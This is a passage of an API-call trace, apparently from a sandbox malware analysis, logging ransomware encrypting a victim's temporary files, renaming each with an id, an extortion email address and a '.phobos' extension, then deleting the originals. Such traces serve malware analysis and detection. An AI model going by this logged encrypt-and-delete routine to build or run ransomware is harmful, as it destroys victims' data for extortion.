(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini")) returned 1 [0192.459] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.460] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0192.460] CloseHandle (hObject=0x134) returned 1 [0192.460] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini")) returned 0x2006 [0192.460] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.460] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.460] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.463] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.463] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.463] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0192.464] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.464] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0192.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.465] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.465] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.465] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.465] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.465] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.465] CloseHandle (hObject=0x134) returned 1 [0192.465] CloseHandle (hObject=0x164) returned 1 [0192.466] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini")) returned 1 [0192.467] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.468] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0192.468] CloseHandle (hObject=0x164) returned 1 [0192.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini")) returned 0x2006 [0192.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.468] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.468] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.469] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.469] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.469] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0192.470] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.470] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0192.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.471] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.471] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.471] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.471] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.471] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.471] CloseHandle (hObject=0x164) returned 1 [0192.471] CloseHandle (hObject=0x134) returned 1 [0192.471] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini")) returned 1 [0192.474] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TlUA0FofxYZmSB Bn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tlua0fofxyzmsb bn.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.475] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=102026) returned 1 [0192.476] CloseHandle (hObject=0x134) returned 1 [0192.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TlUA0FofxYZmSB Bn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tlua0fofxyzmsb bn.gif")) returned 0x2020 [0192.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TlUA0FofxYZmSB Bn.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tlua0fofxyzmsb bn.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TlUA0FofxYZmSB Bn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tlua0fofxyzmsb bn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TlUA0FofxYZmSB Bn.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tlua0fofxyzmsb bn.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.476] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.477] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.477] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18e8a, lpOverlapped=0x0) returned 1 [0192.478] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18e90, dwBufLen=0x18e90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18e90) returned 1 [0192.479] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18e90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18e90, lpOverlapped=0x0) returned 1 [0192.481] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.481] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.481] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.481] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.481] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0192.481] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.481] CloseHandle (hObject=0x134) returned 1 [0192.482] CloseHandle (hObject=0x164) returned 1 [0192.482] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TlUA0FofxYZmSB Bn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tlua0fofxyzmsb bn.gif")) returned 1 [0192.483] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vpW8D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vpw8d.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.484] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67521) returned 1 [0192.484] CloseHandle (hObject=0x164) returned 1 [0192.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vpW8D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vpw8d.wav")) returned 0x2020 [0192.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vpW8D.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vpw8d.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vpW8D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vpw8d.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.484] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.484] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vpW8D.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vpw8d.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.485] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.485] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.485] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x107c1, lpOverlapped=0x0) returned 1 [0192.486] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x107d0, dwBufLen=0x107d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x107d0) returned 1 [0192.487] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x107d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x107d0, lpOverlapped=0x0) returned 1 [0192.488] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.488] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.488] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.488] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.488] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.488] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.488] CloseHandle (hObject=0x164) returned 1 [0192.488] CloseHandle (hObject=0x134) returned 1 [0192.488] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vpW8D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vpw8d.wav")) returned 1 [0192.489] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XSKnYo15F.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xsknyo15f.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.490] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=54466) returned 1 [0192.490] CloseHandle (hObject=0x134) returned 1 [0192.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XSKnYo15F.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xsknyo15f.doc")) returned 0x2020 [0192.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XSKnYo15F.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xsknyo15f.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XSKnYo15F.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xsknyo15f.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XSKnYo15F.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xsknyo15f.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.491] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.491] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.491] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd4c2, lpOverlapped=0x0) returned 1 [0192.492] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd4d0, dwBufLen=0xd4d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd4d0) returned 1 [0192.493] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd4d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd4d0, lpOverlapped=0x0) returned 1 [0192.494] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.494] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.494] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.494] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.494] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.494] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.494] CloseHandle (hObject=0x134) returned 1 [0192.494] CloseHandle (hObject=0x164) returned 1 [0192.495] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XSKnYo15F.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xsknyo15f.doc")) returned 1 [0192.496] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Yb0ESaRT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yb0esart.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, 